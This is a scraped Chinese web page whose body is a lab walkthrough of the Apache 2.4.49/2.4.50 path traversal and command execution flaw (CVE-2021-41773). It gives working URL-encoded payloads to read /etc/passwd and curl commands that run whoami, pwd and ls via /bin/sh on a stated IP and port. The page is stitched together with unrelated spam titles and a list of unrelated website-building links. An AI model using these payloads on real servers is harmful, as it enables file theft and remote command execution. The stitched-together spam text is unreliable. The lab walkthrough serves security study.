当前位置: 首页 > news >正文

做网站虚拟主机多少钱新乡做网站优化

做网站虚拟主机多少钱,新乡做网站优化,厦门建站方案,个体工商户 网站建设本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞#xff08;cve_2021_41773#xff09;。 靶场链接#xff1a;Vulfocus 漏洞威胁分析平台 一#xff0c;漏洞简介。 cve_2021_41773漏洞…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞cve_2021_41773。 靶场链接Vulfocus 漏洞威胁分析平台 一漏洞简介。 cve_2021_41773漏洞是一个目录穿越的高危漏洞主要影响版本有Apache阿帕奇 2.4.49 和 Apache 2.4.50其对路径规范化所做的更改中存在一个路径穿越漏洞攻击者可利用该漏洞读取到Web目录外的其他文件如系统配置文件、网站源码等甚至在特定情况下攻击者可构造恶意请求执行命令控制服务器。 二poc。 具体poc已给出 get传参方式poc为 /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd可以看到是一段经过了url编码的内容解密后为 2post传参 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 经过两次url解码后结果为 三漏洞利用。 打开靶场连接后可以发现是一个阿帕奇服务的默认界面。 通过抓包后发现传参方式为get 此处使用get传参的poc。 进行攻击测试poc填写到红框内 可以看到回显为修改请求头所读的敏感信息。 此处为什么要用burp因为浏览器自动对路径进行了一次url解码用burp发送过去的请求不会被自动解码 ‍四rce。 1查看敏感文件。 在kali上使用curl 命令进⾏进一步渗透工作。 读取敏感文件的命令为 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd ① [ip] 替换成被攻击服务器的 IP。 ② port 替换为被攻击服务器端⼝。 curl简介Linux命令行工具curl详解与服务器之间传输数据_curl socks5代理-CSDN博客 2通用操作。  具体格式为 curl --data echo;shell http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 替换shell为想要执行的命令。 取得敏感信息查询一下当前用户 curl --data echo;whoami http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 查看一下当前目录 curl --data echo;pwd http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 获取flag curl --data echo;ls /tmp http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
http://www.zqtcl.cn/news/159199/

相关文章:

  • 微信小程序怎拼做搬家网站东莞建网站公司
  • 网站推广昔年下拉博客推广链接制作软件
  • php 小企业网站 cmswordpress导航分类
  • 婚恋网站女孩子都是做美容免费空间最大的网盘
  • 建立网站要钱吗找人做网站需求怎么写
  • 网站建设精品课程电商运营主要负责什么
  • 中职网站建设与维护考试题wordpress商店会员管理
  • 物流网站开发策划做提升自己的网站
  • 网站开发交接做网站首页尺寸大小
  • 临沂建网站公司一个工厂做网站有用吗
  • 网站建设代码编译的问题及解决方案天元建设集团有限公司第六分公司
  • 做亚马逊网站费用深圳好蜘蛛网站建设公司
  • 做网站需要办什么手续html简单网页代码实例
  • 中文网页设计模板免费下载超级优化小说
  • 做网站的流程前端做什么网站建设与管理专业学什么
  • 用wordpress做购物网站西安建设工程网站
  • 响应式网站免费模板下载电商怎么做如何从零开始视频
  • 江西网站开发学校联系我们网站制作
  • 做网站首页图片素材营销网站制作要素
  • 云阳网站建设百度对 wordpress 排名
  • 做电商网站需要多少时间网站建设答辩ppt
  • 营销型网站的案例江苏seo网站排名优化
  • 企业网站 备案 网站名称凡科做视频网站
  • 湘潭建设公司网站杭州网站优化
  • 工信部备案网站网站空间服务商
  • 深圳市企业网站seo营销工具桂林百姓网
  • 网站建设所需材料wordpress nginx配置文件
  • 给企业做网站运营广州制作网站公司
  • 一个网站可以有几个关键词网页游戏制作过程
  • 网站可视化后台桥西区网站建设